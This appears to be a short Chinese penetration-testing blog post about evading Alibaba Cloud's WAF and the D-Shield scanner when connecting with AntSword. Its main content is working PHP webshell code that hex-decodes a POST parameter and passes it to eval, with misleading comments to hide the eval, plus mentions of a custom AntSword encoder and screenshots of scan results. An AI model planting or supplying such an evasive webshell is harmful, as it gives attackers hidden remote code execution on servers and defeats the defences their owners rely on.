渗透遇到阿里云的主机,蚁剑连接php一句话的时候如果用默认的几种编码的话都会被拦,所以想改下编码和一句话,同时过d盾和阿里云。
这里没用base64解码,我用hex解码的方式。

PHP一句话

<?phpclass _{    static public $phpcms=Null;    function __construct($l="error"){        self::$phpcms=$l;        @eval/*Defining error level offences*/(null.null.self::$phpcms);    }}function hexToStr($hex){           $str="";         for($i=0;$i<strlen($hex)-1;$i+=2)        $str.=chr(hexdec($hex[$i].$hex[$i+1]));        return  $str;    } $error = null.hexToStr(@$_POST/*\*/["phpcms"]);$d = new _($error);?>

1554392704296.jpg

蚁剑添加编码

1554443681851.jpg

D盾扫描结果

1554393266240.jpg



渗透测试

本博客所有文章除特别声明外,均采用 CC BY-SA 3.0协议 。转载请注明出处!